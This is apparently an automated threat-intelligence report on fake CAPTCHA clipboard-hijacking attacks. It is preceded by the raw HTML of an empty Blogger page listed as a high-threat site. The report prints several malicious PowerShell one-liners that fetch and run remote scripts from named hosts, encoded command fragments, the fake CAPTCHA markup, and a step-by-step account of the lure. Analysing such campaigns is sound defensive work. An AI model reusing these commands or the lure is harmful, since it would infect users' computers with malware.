BlogSearch' data-version='2' id='BlogSearch1'>\n<h3 class='title'>\nSearch This Blog\n</h3>\n<div class='widget-content' role='search'>\n<form action='https://staplebrokenmetaliyro.blogspot.com/search' target='_top'>\n<div class='search-input'>\n<input aria-label='Search this blog' autocomplete='off' name='q' placeholder='Search this blog' value=''/>\n</div>\n<input class='search-action flat-button' type='submit' value='Search'/>\n</form>\n</div>\n</div></div>\n</div>\n<div class='clearboth'></div>\n<div class='blog-name container'>\n<div class='container section' id='header' name='Header'><div class='widget Header' data-version='2' id='Header1'>\n<div class='header-widget'>\n<div>\n<h1>\nstaplebrokenmetal\n</h1>\n</div>\n<p>\n</p>\n</div>\n</div></div>\n<nav role='navigation'>\n<div class='clearboth no-items section' id='page_list_top' name='Page List (Top)'>\n</div>\n</nav>\n</div>\n</div>\n</header>\n<div>\n<div class='vertical-ad-container no-items section' id='ads' name='Ads'>\n</div>\n<main class='centered-bottom' id='main' role='main' tabindex='-1'>\n<h2 class='main-heading'>Posts</h2>\n<div class='main section' id='page_body' name='Page Body'>\n<div class='widget Blog' data-version='2' id='Blog1'>\n<div class='blog-posts hfeed container'>\n<div class='post-outer-container'>\n<div class='no-posts-message'>\nThere's nothing here!\n</div>\n</div>\n</div>\n<div class='blog-posts hfeed container'>\n</div>\n<div class='blog-pager container' id='blog-pager'>\n</div>\n</div>\n</div>\n</main>\n</div>\n<footer class='footer section' id='footer' name='Footer'><div class='widget Attribution' data-version='2' id='Attribution1'>\n<div class='widget-content'>\n<div class='blogger'>\n<a href='https://www.blogger.com' rel='nofollow'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_post_blogger_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\nPowered by Blogger\n</a>\n</div>\n<div class='image-attribution'>\nTheme images by <a href=\"http://www.offset.com/photos/394244\">Michael Elkan</a>\n</div>\n</div>\n</div></footer>\n</div>\n</div>\n</div>\n<aside class='sidebar-container container sidebar-invisible' role='complementary'>\n<div class='navigation'>\n<button class='svg-icon-24-button flat-icon-button ripple sidebar-back'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_arrow_back_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</button>\n</div>\n<div class='sidebar_top_wrapper'>\n<div class='sidebar_top section' id='sidebar_top' name='Sidebar (Top)'><div class='widget Profile' data-version='2' id='Profile1'>\n<div class='wrapper solo'>\n<div class='widget-content individual'>\n<a href='https://www.blogger.com/profile/02686294779557843862' rel='nofollow'>\n<div class='default-avatar-wrapper'>\n<svg class='svg-icon-24 avatar-icon'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_person_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</div>\n</a>\n<div class='profile-info'>\n<dl class='profile-datablock'>\n<dt class='profile-data'>\n<a class='profile-link g-profile' href='https://www.blogger.com/profile/02686294779557843862' rel='author nofollow'>\nWeesepuld\n</a>\n</dt>\n</dl>\n<a class='profile-link visit-profile pill-button' href='https://www.blogger.com/profile/02686294779557843862' rel='author'>\nVisit profile\n</a>\n</div>\n</div>\n</div>\n</div></div>\n</div>\n<div class='sidebar_bottom section' id='sidebar_bottom' name='Sidebar (Bottom)'>\n<div class='widget ReportAbuse' data-version='2' id='ReportAbuse1'>\n<h3 class='title'>\n<a class='report_abuse' href='https://www.blogger.com/go/report-abuse' rel='noopener nofollow' target='_blank'>\nReport Abuse\n</a>\n</h3>\n</div></div>\n</aside>\n<script type=\"text/javascript\" src=\"https://resources.blogblog.com/blogblog/data/res/2705757678-indie_compiled.js\" async=\"true\"></script>\n\n<script type=\"text/javascript\" src=\"https://www.blogger.com/static/v1/widgets/4071838938-widgets.js\"></script>\n<script type='text/javascript'>\nwindow['__wavt'] = 'AOuZoY7CVEvgYI50kwr0zWHtA7eI90dl-A:1745423370361';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\\x3d3967763303726818370','//staplebrokenmetaliyro.blogspot.com/','3967763303726818370');\n_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '3967763303726818370', 'title': 'staplebrokenmetal', 'url': 'https://staplebrokenmetaliyro.blogspot.com/', 'canonicalUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'homepageUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'searchUrl': 'https://staplebrokenmetaliyro.blogspot.com/search', 'canonicalHomepageUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'blogspotFaviconUrl': 'https://staplebrokenmetaliyro.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\\x3clink rel\\x3d\\x22alternate\\x22 type\\x3d\\x22application/atom+xml\\x22 title\\x3d\\x22staplebrokenmetal - Atom\\x22 href\\x3d\\x22https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default\\x22 /\\x3e\\n\\x3clink rel\\x3d\\x22alternate\\x22 type\\x3d\\x22application/rss+xml\\x22 title\\x3d\\x22staplebrokenmetal - RSS\\x22 href\\x3d\\x22https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt\\x3drss\\x22 /\\x3e\\n\\x3clink rel\\x3d\\x22service.post\\x22 type\\x3d\\x22application/atom+xml\\x22 title\\x3d\\x22staplebrokenmetal - Atom\\x22 href\\x3d\\x22https://www.blogger.com/feeds/3967763303726818370/posts/default\\x22 /\\x3e\\n', 'meTag': '\\x3clink rel\\x3d\\x22me\\x22 href\\x3d\\x22https://www.blogger.com/profile/02686294779557843862\\x22 /\\x3e\\n', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': true, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/11e6ba02c47cab30', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'X', 'key': 'twitter', 'shareMessage': 'Share to X', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\\x3cscript type\\x3d\\x22text/javascript\\x22\\x3ewindow.___gcfg \\x3d {\\x27lang\\x27: \\x27en\\x27};\\x3c/script\\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'index', 'pageName': '', 'pageTitle': 'staplebrokenmetal'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': true, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\\x3dtimeslide'}, 'isMobile': false, 'title': 'staplebrokenmetal', 'description': '', 'url': 'https://staplebrokenmetaliyro.blogspot.com/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': true, 'isArchive': false, 'isLabelSearch': false}}, {'name': 'widgets', 'data': [{'title': 'Search This Blog', 'type': 'BlogSearch', 'sectionId': 'search_top', 'id': 'BlogSearch1'}, {'title': 'staplebrokenmetal (Header)', 'type': 'Header', 'sectionId': 'header', 'id': 'Header1'}, {'title': 'Blog Posts', 'type': 'Blog', 'sectionId': 'page_body', 'id': 'Blog1', 'posts': [], 'headerByline': {'regionName': 'header1', 'items': [{'name': 'share', 'label': ''}, {'name': 'timestamp', 'label': ''}]}, 'footerBylines': [{'regionName': 'footer1', 'items': [{'name': 'comments', 'label': 'comments'}, {'name': 'icons', 'label': ''}]}, {'regionName': 'footer2', 'items': [{'name': 'labels', 'label': ''}]}, {'regionName': 'footer3', 'items': [{'name': 'location', 'label': 'Location:'}]}], 'allBylineItems': [{'name': 'share', 'label': ''}, {'name': 'timestamp', 'label': ''}, {'name': 'comments', 'label': 'comments'}, {'name': 'icons', 'label': ''}, {'name': 'labels', 'label': ''}, {'name': 'location', 'label': 'Location:'}]}, {'title': '', 'type': 'PopularPosts', 'sectionId': 'page_body', 'id': 'PopularPosts1', 'posts': []}, {'type': 'Attribution', 'sectionId': 'footer', 'id': 'Attribution1'}, {'title': 'About Me', 'type': 'Profile', 'sectionId': 'sidebar_top', 'id': 'Profile1'}, {'title': '', 'type': 'ReportAbuse', 'sectionId': 'sidebar_bottom', 'id': 'ReportAbuse1'}]}]);\n_WidgetManager._RegisterWidget('_BlogSearchView', new _WidgetInfo('BlogSearch1', 'search_top', document.getElementById('BlogSearch1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'page_body', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'navMessage': 'No posts.', 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/2820493333-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/3681588378-lightbox_bundle.css'}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_PopularPostsView', new _WidgetInfo('PopularPosts1', 'page_body', document.getElementById('PopularPosts1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_AttributionView', new _WidgetInfo('Attribution1', 'footer', document.getElementById('Attribution1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_ProfileView', new _WidgetInfo('Profile1', 'sidebar_top', document.getElementById('Profile1'), {}, 'displayModeFull'));\n_WidgetManager._RegisterWidget('_ReportAbuseView', new _WidgetInfo('ReportAbuse1', 'sidebar_bottom', document.getElementById('ReportAbuse1'), {}, 'displayModeFull'));\n</script>\n</body>\n</html>",
"ThreatLevel": "High"
}
Technical Analysis
ClickGrab Threat Analysis Report - 2025-04-24
Most Common External Domains
- www.google.com: 30 occurrences
- use.fontawesome.com: 19 occurrences
- cdnjs.cloudflare.com: 15 occurrences
- staplebrokenmetaliyro.blogspot.com: 15 occurrences
- www.blogger.com: 13 occurrences
- www.webgo.de: 10 occurrences
- www.w3.org: 7 occurrences
- t.me: 6 occurrences
- browser.certif-update.website: 4 occurrences
- www.networksolutions.com: 2 occurrences
Common Pattern Analysis
reCAPTCHA imagery (19 occurrences, 1 distinct URLs)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (19 times)
Font resources (34 occurrences, 2 distinct URLs)
- https://use.fontawesome.com/releases/v5.0.0/css/all.css (19 times)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (15 times)
CDN hosted scripts (16 occurrences, 2 distinct URLs)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (15 times)
- https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
Google resources (32 occurrences, 8 distinct URLs)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (19 times)
- https://www.google.com/intl/en/policies/privacy/ (4 times)
- https://www.google.com/intl/en/policies/terms/ (4 times)
- http://www.google.com/2005/gml/b (1 times)
- http://www.google.com/2005/gml/data (1 times)
- ...and 3 more distinct URLs
JavaScript Clipboard Analysis
Found clipboard manipulation code snippets in 38 places
document.execCommand copy
Found in 38 snippets (100.0% of clipboard code)
Examples:
document.execCommand("copy")
textarea manipulation
Found in 38 snippets (100.0% of clipboard code)
Fake CAPTCHA HTML Examples
Here's how the fake CAPTCHA verification appears in HTML:
Example 1:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>
Example 2:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>
Command Context Analysis
Found 23 PowerShell download context snippets
stageClipboard Function
Found 15 references to stageClipboard function
Example stageClipboard contexts:
Example 1:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 2:
...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 3:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Malicious Commands
Found 4 commandToRun declarations
Malicious commands being prepared for clipboard:
Example 1:
Command:
powershell
Context:
WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...
Example 2:
Command:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Example 3:
Command:
powershell
Context:
...idden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Example 4:
Command:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
PowerShell Parameters
Found 2 htaPath declarations
Malicious PowerShell parameters:
Example 1:
Parameters:
-w hidden -c \
Context:
...d; const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaP
Example 2:
Parameters:
-w hidden -c \
Context:
...const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
Clipboard Attack Pattern Analysis
Based on the data analyzed, here's the complete clipboard attack pattern:
1. Initial Victim Engagement
Victim is shown a fake CAPTCHA verification UI with Google reCAPTCHA branding
Common elements found: - Google reCAPTCHA logo image - Font resources from CDNs - "I am not a robot" checkbox
Example Fake CAPTCHA HTML:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>...
2. Malicious Code Preparation
When user clicks the verification checkbox:
- A 'commandToRun' variable is set with a malicious PowerShell command
- The command is typically obfuscated and often downloads second-stage payloads
- Common download destinations include:
Example Command Preparation Code:
WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...
3. Clipboard Hijacking
The malicious command is copied to the user's clipboard:
- A temporary textarea element is created
- The command is combined with verification text like "[CHECKMARK] I am not a robot"
- document.execCommand("copy") is used to copy to clipboard
- The temporary element is removed from the DOM
4. Social Engineering Component
User sees a success message:
- The verification UI shows success with a checkmark symbol
- User is told they've passed verification
- The clipboard now contains the malicious command + verification text
5. Attack Objective
Final stage of the attack:
- When user pastes the clipboard contents elsewhere (like in terminal)
- They see what looks like verification text
- But the PowerShell command at the start gets executed
- This downloads and runs additional malware from attacker-controlled servers
Reconstructed Attack Example
What's copied to clipboard:
powershell # [CHECKMARK] 'I am not a robot - reCAPTCHA Verification Hash: XY12Z345'
What user sees when pasting: A verification success message
What actually happens: PowerShell executes the hidden malicious command
Conclusion
This is a sophisticated social engineering attack that tricks users into:
- Thinking they're completing a legitimate CAPTCHA
- Unknowingly copying malicious code to their clipboard
- Executing malware when they paste what they think is just verification text
Statistics
- Total sites analyzed: 31
- Sites with malicious content: 20
- Total unique domains: 24
- Total URLs extracted: 138